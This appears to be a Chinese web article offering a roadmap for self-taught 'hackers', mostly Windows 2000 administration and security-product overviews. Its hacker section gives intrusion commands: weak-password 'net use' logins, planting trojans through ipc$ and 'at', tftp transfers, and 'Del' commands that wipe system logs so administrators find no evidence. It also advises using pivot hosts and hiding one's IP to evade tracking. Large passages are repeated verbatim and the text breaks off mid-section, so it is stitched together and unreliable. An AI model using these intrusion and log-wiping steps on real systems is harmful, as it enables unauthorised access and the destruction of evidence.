自学黑客怎么看懂了_为什么黑客都是自学的
目录:
想掌握黑客类的知识应该学些什么呢
基础:
如何去学习
·要有学习目标
·要有学习计划
·要有正确的心态
·有很强的自学能力
学习目标
·1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家?网络黑客等)
·2.自己目前的水平和能力有多高
·能简单操作windows2000
·能简单配置windows2000的一些服务
·能熟练的配置Windows2000的各种服务
·能熟练配置win2000和各种网络设备联网
·能简单操作Linux,Unix,Hp-unix, Solaris中的一种或者多种操作系统
·能配置cicso,huawei,3com,朗迅等网络设备
·会简单编写C/C++,Delphi,Java,PB,VB,Perl
·能简单编写Asp,Php,Cgi和script,shell脚本
·3.必须学会不相信态度,尊重各种各样的能力
·不要为那些装模做样的人浪费时间
·尊重别人的能力,
·会享受提高自己能力的乐趣.
·在知道了自己的水平和能力之后就要开始自己的目标了
·--------安全专家
·--------黑客
·--------高级程序员
·黑客是建设网络,不是破坏网络, 破坏者是骇客;
·黑客有入侵的技术,但是他们是维护网络的,所以和安全专家是差不多的;
·因为懂得如何入侵才知道如何维护
·因为懂得如何维护才更要了解如何入侵
·这是 黑客与安全专家的联系
·但,他们都是在会编程的基础上成长的!
·下面我们开始我们的学习计划!
学习计划
有了学习计划才能更有效的学习
安全学习计划
不奢求对win98有多么精通,我们也不讲解win98如何应用,如何精通,我们的起步是win2000 s
erver,这是我们培训的最低标准,你对英语有一定的了解也是必不可少
最基础
·a.会装win2000,知道在安装的时候有两种分区格式,NTFS与FAT32 及他们的区别,知道win2
000可以在安装的时候分区,格式化硬盘, 可以定制安装,可以定制自己需要安装的一些组件
,如果有网络适配器,可以直接加入域中 学习点:NTFS和FAT32分区的不同 各个组件的作用
域的定义
·b.知道如何开,关机 知道注销的用处
·c.知道win2000下面各主要目录的作用 Documents and Settings,WINNT,system32 Progra
m Files
·d.知道管理工具里面各个组件的定义
·e.学会应用命令提示符cmd(dos)
·f.知道计算机管理里面的各个选项的不通
·g.知道win2000强大的网络管理功能
·h.能非常熟练的操作win2000
·i.知道IP地址,子网掩码,网关和MAC的区别
进阶
·A.配置IIS,知道各个选项的作用
·B.配置DNS,DHCP
·C.配置主控制域,辅助域
·D.配置DFS
·E.配置路由和远程访问
·F.配置安全策略IPSEC
·G.配置service(服务)
·H.配置磁盘管理,磁盘分额
·i. 配置RAID(0,1,0+1,5)
·J.路由器的安装与简单配置
·K.交换机的安装与简单配置
·L.常见的VPN,VLAN,NAT配置
·M.配置常见的企业级防火墙
·N.配置常见的企业级防病毒软件
高级
·之前我们学到的是任何一个想成为网络安全专家和黑客基本知识中的一部分
·你作到了吗??
·如果你做到了,足以找到一份很不错的工作!
配置负载均衡
·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+负载均衡+ASP(PHP.CGI)+CHECK PIONT(ISA
SERVER) ·
·配置三层交换网络 ·
·配置各种复杂的网络环境
·能策划一个非常完整的网络方案 ·
·能独自组建一个大型的企业级网络 ·
·能迅速解决网络中出现的各种疑难问题
结束
·在你上面的都学好了,你已经是一个高级人才了,也是我们VIP培训的目标!
·可以找到一份非常好的工作
·不会再因为给女朋友买不起玫瑰而发愁了!
安全:
导读
·系统安全服务(SYSTEM)
·防火墙系统(FIREWALL)
·入侵检测(IDS)
·身份验证(CA)
·网站监控和恢复(WEBSITE)
·安全电子商务(E-BUSINESS)
·安全电子邮件(E-MAIL)
·安全办公自动化(OA)
·Internet访问和监控(AC)
·病毒防范(VIRUS)
·虚拟局域网(VPN)
系统安全服务
·系统安全管理
·系统安全评估
·系统安全加固
·系统安全维护
·安全技能学习
系统安全管理
·信息系统安全策略
·信息系统管理员安全手册
·信息系统用户安全手册
·紧急事件处理流程
系统安全评估
1、系统整体安全分析
· 分析用户的网络拓扑结构,以找出其结构性及网络 配置上存在的安全隐患。
· 通过考察用户信息设备的放置场地,以使得设备物理上是安全的。
· 分析用户信息系统的管理、使用流程,以使得系统 能够安全地管理、安全地使用
2、主机系统安全检测
· 通过对主机进行安全扫描,以发现系统的常见的安全漏洞。
· 对于特定的系统,采用特别的工具进行安全扫描。
· 根据经验,对系统存在的漏洞进行综合分析。
· 给出系统安全漏洞报告。
· 指出各个安全漏洞产生的原因以及会造成的危险。
· 给出修复安全漏洞的建议
3、网络设备安全检测
· 通过对网络进行安全扫描,以发现网络设备的安全漏洞。
· 根据经验,对网络设备存在的漏洞进行综合析。
· 给出网络设备安全漏洞报告。
· 指出各个安全漏洞产生的原因以及会造成的险。
· 给出修复安全漏洞的建议。
安全系统加固
·为用户系统打最新安全补丁程序。
·为用户修复系统、网络中的安全漏洞。
·为用户去掉不必要的服务和应用系统。
·为用户系统设置用户权限访问策略。
·为用户系统设置文件和目录访问策略。
·针对用户系统应用进行相应的安全处理。
安全系统维护
·防火墙系统维护,安全日志分析
·IDS系统维护,安全日志分析
·VPN系统维护,安全日志分析
·认证系统维护,安全日志分析
·服务器、主机系统,安全日志分析
·其它各类安全设施维护及日志分析
安全技能培训
·网络安全基础知识
·网络攻击手段演示和防范措施
·防火墙的原理和使用
·VPN的原理和使用
·漏洞扫描工具的原理和使用
·IDS(入侵检测系统)的原理和使用
·身份认证系统的原理和使用
·防病毒产品的原理和使用
·系统管理员安全培训
·一般用户安全培训
防火墙系统
·防火墙的定义
·防火墙的分类
·包过滤防火墙
·应用网关防火墙
·状态检测防火墙
·一般企业防火墙配置
·政府机构防火墙配置
·涉密网络保密网关配置
·高可用性和负载均衡防火墙系统
·高速防火墙系统
防火墙的定义
·用以连接不同信任级别网络的设备。
·用来根据制定的安全规则对网络间的通信进行控制
防火墙的分类
·包过滤 (Packet Filters)
·应用网关 (Application Gateways)
·状态检测(Stateful Inspection)
包过滤防火墙
·包 过 滤 技 术
·主要在路由器上实现,根据用户定义的内容(如IP地址、端口号)进行过滤。包过滤在网
络层进行包检查与应用无关。
· 优 点
· 具有良好的性能和可伸缩性。
· 缺点
· 由于包过滤技术是对应用不敏感的,无法理解特定通讯的含义,因而安全性很差。
应用网关防火墙
·应用网关技术
·第二代防火墙技术,其在应用的检查方面有了较大的改进,能监测所有应用层,同时对应
用“内容”(Content Information)的含义引入到了防火墙策略的决策处理。
· 优点
· 安全性比较高。
· 缺点
· 1、该方法对每一个请求都必须建立两个连接,一个从客户端到防火墙系统,另一个从
防火墙系统到服务器,这会严重影响性能。
· 2、防火墙网关暴露在攻击者之中。
· 3、对每一个代理需要有一个独立的应用进程或 daemon 来处理, 这样扩展性和支持
新应用方面存在问题。
检测状态防火墙
· 属第三代防火墙技术,克服了以上两种方法的缺点,引入了OSI全七层监测能力,同时
又能保持 Client/Server的体系结构,也即对用户访问是透明的。
· 防火墙能保护、限制其他用户对防火墙网关本身的访问。
· 状态检测技术在网络层截获数据包后交给INSPECT Engine,通过 INSPECT Engine 可以
从数据包中抽取安全决策所需的所有源于应用层中的状态相关信息,并在动态状态表中 维
持这些信息以提供后继连接的可能性预测。该方法能提供高安全性、高性能和扩展性、高伸
缩性的解决方案。
入侵检测系统
·处理攻击时遇到的典型问题
·解决入侵的方法和手段
·基于网络的入侵检测
·基于主机的入侵检测
·入侵检测系统典型配置
处理攻击时遇到的问题
·获得的信息不足
·不知到网络上发生了什么事。
·无法判定系统是否已经被入侵。
·信息不准确
·人员少
·没有足够的人员维护管理。
·缺乏规范的处理程序
·发现攻击时如何反应?
·下一步该如何处理?
解决入侵的方法和手段
·采用入侵实时入侵监控系统(IDS)
·对系统、网络中发生的事件进行实时监控。
·当发生入侵事件时能即时反应。
·对入侵事件进行详细记录并跟踪。
基于主机的入侵检测
·软件模块安装在包含有重要数据的主机上
·监视操作系统的日志以发现攻击的特征。
·监视代理所处主机上的所有进程和用户.
·监视暴力登录攻击(brute-force login), 试图改变或绕过安全设定,及特权的滥用等
。
·当新的日志产生时,为了减小对CPU的影响,代理程序暂时中断。
基于网络的入侵检测
·软件安装在专门的主机上,放置于关键的网段
·将配置该软件主机的网卡设置为混杂模式,使得该主机能接受网段上所有的包。
·分析数据包以判断是否有黑客攻击。
·监视网段上的所有数据。
·对网络的流量无任何影响。
·能检测到 denial of service attacks, unauthorized access attempts, pre-attack s
cans等攻击。
身份认证系统
·用户身份认证的方法
·不同认证方法的安全级别
·用户身份认证的常用方式
·解决问题的方法
·目前比较成熟的双因素认证方法
用户身份验证
·你知道的一些东西
· 密码, 身份证号,生日
·你有的一些东西
· 磁卡, 智能卡,令牌, 钥匙
·你独有的一些东西
· 指纹,声音,视网膜
密码是不安全的
·可以破解密码的工具太多
·大多密码在网络中是明文传输的
·密码可以网络离线时被窥测
·密码和文件从PC和服务器上被转移了
·好记的密码容易被猜到,不易猜测的密码又太难记
解决方法
·使用混合的工具:如IC卡+PIN
网站监控与恢复系统
·典型的Web服务器应用
·Web服务器存在的安全问题
·网站安全解决方法
典型web服务器应用
·Internet--路由器--防火墙--web站点
· |
· |
· 内部网
·所有的放在防火墙后面
Web服务器存在的安全问题
· 网页被非法篡改是网站内容提供者最头痛的问题。在采用防火墙后,Web服务器本身的漏
洞成为了网站被黑的主要问题。
· Web应用服务器(如IIS,Apache中存在着大量的安 全漏洞.)
· 用户自己开发的CGI、ASP、PHP应用中存在着大量潜在的漏洞。
网站安全
·采用Web服务器监控与恢复系统
·该系统提供对网站文件内容的实时监控,发现被改动后立即报警并自动恢复。
电子商务安全系统
·典型的电子商务应用
·电子商务中存在的安全问题
·电子商务的安全解决方法
·实时数据交换系统
典型电子商务应用
·Internet---防火墙---Web服务器
· || |
· || |
· 内部网(数据库)
电子商务中存在的安全问题
·1、Web服务器端
·Web应用服务器(如IIS、Apache中存在着大量的安全漏洞。用户自己开发的CGI、ASP、PH
P应用中存在着潜在的漏洞。
· 黑客通过这些漏洞攻击Web服务器,可非法篡改网页,造成恶劣影响,动摇了电子商务使
用者的信心。
· 甚至可获得Web服务器上大量的敏感资料,如用户的信用卡号,用以连接内部数据库的帐
号和口令。
· 可能通过控制Web服务器,来攻击内部数据库。
电子商务中存在的安全问题
·2、SSL协议
·SSL加密强度低。由于浏览器默认的加密模块只支持40位的低强度加密,而且即使在浏览
器中安装更高位的加密模块,由于WEB服务器不提供对高位SSL链接的支持同样无法实现高强
度SSL加密链接。
· 无法解决电子商务中的用户签名。SSL链接建立WEB服务器和用户浏览器之间的安全通道
只能保证在安全通道内的信息不被窃听或篡改,并不能对用户发送的信息进行签名以保证信
息的有效性和不可抵赖性,而这正是电子商务中必须解决的问题。
电子商务的安全解决方法
·将WEB服务器分为两部分:一般内容的WEB服务器和交易WEB服务器。
· 一般内容的WEB服务器放置在DMZ区内,采用WEB站点监控和恢复系统保护,防止主页被非
法改动。
· 交易WEB服务器放置在内部网内,通过一台物理分隔的实时数据交换系统将其与DMZ区相
连。
· 在客户机和服务器端安装SSL代理,从而获得128位的高强度加密通道
实时数据交换系统
·将系统外部 Web服务器和内部应用Web服务器物理隔开.
·外部Web服务器用于存放一般的信息,内部Web服 务器用于存放敏感信息,并和内部数据
库连接。
·外部用户通过http访问位于DMZ区内的一般Web服务器。
·当进行交易时,用户需访问位于内部网内的应用服务器。
·https连接首先到达实时数据交换系统的虚拟外部Web服务器,实时数据交换系统将https
协议解开,只将https连接的数据内容拷贝到虚拟内部Web服务器,虚拟内部Web服务器将使
用该数据重新发起https连接到实际的内部应用Web服务器.
·内外通过实时数据交换系统进行数据交换,无任何协议和连接穿过实时数据交换系统。
·即使DMZ区的Web服务器受到攻击, 攻击者也的不到任何有用的信息
安全电子邮件系统
·电子邮件的安全问题
·安全电子邮件的解决方法
·一个安全邮件的使用过程
电子邮件的安全问题
·如何保证发送的敏感信息不被泄漏
·如何保证发送的信息不被篡改
·如何确认发件人的真实身份
·如何防止发件人的抵赖行为
安全电子邮件的解决方法
·将PKI体系应用到邮件系统中
·邮件的加密和解密以实现数据的保密。
·邮件的数字签名(鉴别)实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可*的安全性。
·采用公开密钥和对称密钥相结合的密钥体系。
·支持128bit对称密钥算法和1024bit公开密钥算法。
办公自动化系统的安全问题
· 如何保证发送的敏感信息不被泄漏
· 如何保证发送的信息不被篡改
· 如何确认发件人的真实身份
· 如何防止发件人的抵赖行为
安全办公自动化系统的解决方法
·将PKI体系应用到办公自动化系统中
·工作流信息的加密和解密以实现数据保密
·工作流信息的数字签名(鉴别)实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可*的安全性。
·采用公开密钥和对称密钥相结合的密钥体系
·支持128bit对称密钥算法和1024bit公开密钥算法。
Internet访问及控制系统
·Internet使用存在的问题
·Internet使用的解决方法
·内容缓存系统
·Internet站点过滤系统
Internet访问存在的问题
·Internet接入带宽不足,访问比较慢。
·大量的用户访问相同的内容,造成带宽的进一步拥挤。
·在上班时间里大量的Internet访问是与业务无关的。
·有人使用公司的Internet系统访问色情网站。
·有人使用公司的Internet系统访问反动站点。
·管理人员无法知道Internet系统的使用情况。
Internet访问的解决方法
· 对于问题一,采用内容缓存系统。
· 对于问题二,采用Internet 站点过滤系统。
内容缓存系统
·1、Client 发起http连接请求
·2、Proxy 收到请求后将检查内部缓存内是否有所需内容,若有,则返还给Client。
·3、若无,则Proxy根据请求向目的服务器发起请求。
·4、Web服务器将内容返回到Proxy服务器。
·5、Proxy服务器将得到的内容发回给Client,并在自己的缓存中保存一份。
Internet站点过滤系统 (一)
·1、Client 发起http连接请求
·2、连接到达防火墙时防火墙将URL送到WebSense Server 检查。
·3、WebSense 将审查结果返回到防火墙。
·4、防火墙根据其策略决定是否让该连接通过。
Internet站点过滤系统 (二)
·1、Client 发起http连接请求
·2、Proxy 受到请求后将URL送到WebSense Server检查。
·3、Proxy根据返回的结果决定是否接收该连接请求。
病毒防范系统
· 互连网时代对防病毒系统的要求
· 计算机病毒解决方法
· 典型病毒防范系统部署
互联网时代对防病毒系统的要求
· 由于计算机的联网使用,使得病毒传播的途径大为增多:网络文件共享、电子邮件、Int
ernet文件下载,传播速度也大为加快。
· 新病毒的出现速度加快,用户的防病毒软件的病毒特征码没能及时更新。
· 目前已出现了恶意的Java、ActiveX,当使用者浏览到包含这些代码的网页时,会造成安
全问题。
· 一些来历不明的电子邮件程序或下载的程序中带有特洛依木马,可能会造成受害者的主
机被他人控制。
计算机病毒解决方法
· 从系统的观点考虑病毒的防范,在所有病毒传输的途径上均配置防病毒软件,如客户端
(Win98、 · Win2000)、文件服务器(NT、Netware)、邮件服务器(Exchange、Lotus
Notes)、Internet接入系统(Proxy、Firewall)等。
· 整个病毒防范系统采用集中管理的方式,病毒特征码统一更新,安全策略集中设定,从
而使得整个网络系统的病毒特征码得到快速更新。
· 通过在客户端的浏览器和Proxy、Firewall中嵌入病毒检查软件,来防范下在程序中带有
的病毒和可能的恶意Java、ActiveX等可执行代码的攻击。
VPN(虚拟私有网)
· 数据加密分类
· 物理线路加密
· 数据链路加密
· 网络层加密—IPSec
· 传输层加密—SSL
数据加密类型
·物理层-物理层 物理线路加密
·数据链路层-数据链路层 (路由器访问)
·在数据链路层(如PPP)进行加密 L2TP、PPTP、L2F
·网络层-网络层(路由器 防火墙 主机)
·在网络层 (如IP)进行加密 IPSec
·传输层-传输层 (对TCP进行加密 SSL)
·应用层-应用层(在应用层 (如TCP)进行加密 S/MIME、SET、SSH)
物理线路加密
· DDN 加密机
· 帧中继加密机
· 异步拨号Modem
· ISDN线路密码机
· ATM加密机
注:传输层加密
·Secure Sockets Layer (SSL) 是一个端到端的Internet 安全协议,通过采用数字证书,
它提供了数据加密、身份认证的功能。SSL建立在传输层,它为客户机和服务器在应用级建
立起一个端到断的安全会话。
·SSL代理—128位的高强度加密模块
结束语·恭喜你:
·学完这些并且可以熟练应用,已经是一个真正的网络安全专家了!
·希望此时的你旁边有个温柔稍有点调皮的女朋友,为这孤独而寂寞的网络添加一点跳动的
色彩!
黑客编:
必须要掌握的几个命令
·Net
·netsh
·Ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping
必须要掌握的几个协议
·http
·dns
·ftp
·Pop
·Smtp
·Icmp
·Udp
·tcp
开始
·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了!
·因为你掌握了这些,剩余的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具
高级
·自己编写专用的黑客工具
·自己发现系统漏洞
黑客入侵手段
·收集信息:
· 收集要入侵的目标信息
· IP,域名,端口,漏洞,位置
弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip “password” /user:user
·如果目标机开3389服务,可以直接连接
·在sql的sa弱口令,可以用sql连接器直接 ·登陆
后门木马
·如果有ipc$共享,可以copy过去木马后门
·用at启动
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·T –i ip get *.* *.*
·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行
密码破解
·远程破解mysql,mssql,ftp,mail,共享密码
·本地破解管理员(administrator)密码
缓冲溢出
·可以用缓冲溢出攻击,
·比如流行的webdev,rdcom模块漏洞
·可以直接得到system管理权限
·缓冲溢出后的一般现象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32
Web服务漏洞
·例如:
·Unicode漏洞遍历磁盘和执行程序
·二次编码漏洞遍历磁盘和执行程序
·.HTR漏洞查看源代码
嗅探监听
·例如:
·针对web监听
·针对mail监听
·工具如:sinffer , iris
欺骗攻击
·例如:
·运用arp欺骗攻击
伪装欺骗
·常见的如:mail病毒
·把一个文件改名字甚至图标,欺骗对方执行
社会工程学
·例如:
·QQ聊天诱惑
·EMAIL信息
·电话
·诱惑
拒绝服务
·例如:
·Dos攻击
·Ddos攻击
利用跳板
·利用自己的肉鸡作为跳板攻击别的机器
·My PC------跳板(肉鸡)---目标
路由器漏洞
·如:
·原始密码
·程序漏洞
防火墙
·利用欺骗攻击防火墙,导致防火墙功能失效
·利用防火墙的模块漏洞
unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·这些目前先不讲解
精通黑客工具
·必须有一套自己可以完全掌握的黑客工具
·如端口扫描 Nscan,bluescanport
·监听工具:sinffer iris
·telnet工具:nc
·扫描工具:sss,nmap, LANguard
·后门工具:radmin,winshell
·密码破解:lc4
·远程管理:pcanywhere
·会使用各种经典的黑客工具
清除日志
·在你入侵机器以后,离开的时候,要完全清除
·自己在那台机器上留下的痕迹
·例如清除
·Del C:\WINNT\system32\LogFiles\*.*
·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt
如果你不清除日志
·当目标机器的管理员发现你的证据
·完全可以让你在大墙内渡过一段日子
黑客
·当你完全掌握这些后
·你就成为了一名小黑客
高级
·编写自己的黑客工具
·发现系统漏洞
高级黑客
·目前你足以成为一个高级黑客了
真正的黑客
·精通各种网络协议
·精通操作系统
·精通编程技术
·精通安全防护
·不搞破坏
·挑战技术难题
结束
·想学好这些,并不是*别人给你的,而是*自己的努力,自己的自学得到的!
·别人只能指导你,怎么去做,只能告诉方法,
·真正的实施是你自己,经过N*N个日夜努力换来的
学习黑客需要先学习什么基础?(零基础)
首先,你要想明白自己为什么要想学习黑客技术,如果只是为了学点技术来做点坏事,或者为自己谋取一点不法利益的话,还是不学为好,还有另外一方面,就是你真正的喜欢黑客技术,在我看来,只有你真正对一件是有兴趣才能学好,做好,这是一个亘古不变的哲理.再有,光有热情是不够的,还要有毅力,耐心,决心,信心,运气等等的东西,所以说一个真正的黑客是一个了不起的人物,它具有很多人没有的优秀品质,先说一下除了技术之外所需要的东西,再说一下技术上的吧,其实技术上也是分很多方面的,主要分为hacker和cracker.hacker主要是网络安全方面的,cracker主要是解密方面的. 先说一下hacker要掌握的东西,首先,要对tcp/ip协议有足够的了解,因为网络方面的东西是离不开这些的,再有要掌握多种语言,你不一定要精通,当一定要了解,再有就是学习一下网站数据库安全方面的东西,如asp注入,php注入等方面的东西,这些东西要说清楚是很麻烦的,你自己可以根据自己的爱好去学习 再说一下cracker,他们主要是通过反汇编软件,来了解程序的内部结构,从而找出加密算法,找出注册码,根据我的经验,要想在这方面有所成就,就要付出极大的努力,经常是需要工作到深夜的,但是也不要气馁,只要决定了要学,你就一定能学好,这只是时间问题,有的时候你会感觉自己不会进步,但是你还只要坚持下来了,就会感觉自己其实是在慢慢的进步的
黑客要知道些什么基本知识?
一、学习技术:
互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“黑客身份”超过一年。
初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。
二、伪装自己:
黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。
伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网络进行攻击,否则一旦自己的行迹败露,最终害的害是自己。
如果有朝一日你成为了真正的黑客,我也同样不赞成你对网络进行攻击,毕竟黑客的成长是一种学习,而不是一种犯罪。
三、发现漏洞:
漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。
黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑客实践中,黑客也用自己的实际行动向世人印证了这一点--世界上没有“不存在漏洞”的程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。
四、利用漏洞:
对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,黑客利用漏洞可以做下面的事情:
1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统;
2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器;
3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管的服务器作为工具,寻找并入侵下一个系统;
4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护网络安全的事情;
5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服务器他们决不留情,系统崩溃会让他们感到无限的快感!
第二节、黑客应掌握的基本技能
从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。
一、了解一定量的英文:
学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。
二、学会基本软件的使用:
这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后面将会介绍几款流行的软件使用方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。
三、初步了解网络协议和工作原理:
所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。
四、熟悉几种流行的编程语言和脚本:
同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。
五、熟悉网络应用程序:
网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache等服务器后台;还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依靠理论学习要容易许多,能够达到事半功倍的效果
/本篇文章来源于 新贵网 原文出处:
黑客是怎样练成的?
最经典的黑客技术入门知识
以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker),也就是我们平时经常听说的“黑客”(Cacker)和“红客”(Hacker)。
无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。
很多人曾经问我:“做黑客平时都做什么?是不是非常刺激?”也有人对黑客的理解是“天天做无聊且重复的事情”。实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。由于学习黑客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得。
在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。黑客的行为主要有以下几种:
一、学习技术:
互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“黑客身份”超过一年。
初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。
二、伪装自己:
黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。
伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网络进行攻击,否则一旦自己的行迹败露,最终害的害是自己。
如果有朝一日你成为了真正的黑客,我也同样不赞成你对网络进行攻击,毕竟黑客的成长是一种学习,而不是一种犯罪。
三、发现漏洞:
漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。
黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑客实践中,黑客也用自己的实际行动向世人印证了这一点——世界上没有“不存在漏洞”的程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。
四、利用漏洞:
对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,黑客利用漏洞可以做下面的事情:
1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统;
2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器;
3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管的服务器作为工具,寻找并入侵下一个系统;
4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护网络安全的事情;
5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服务器他们决不留情,系统崩溃会让他们感到无限的快感!
第二节、黑客应掌握的基本技能
从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。
一、了解一定量的英文:
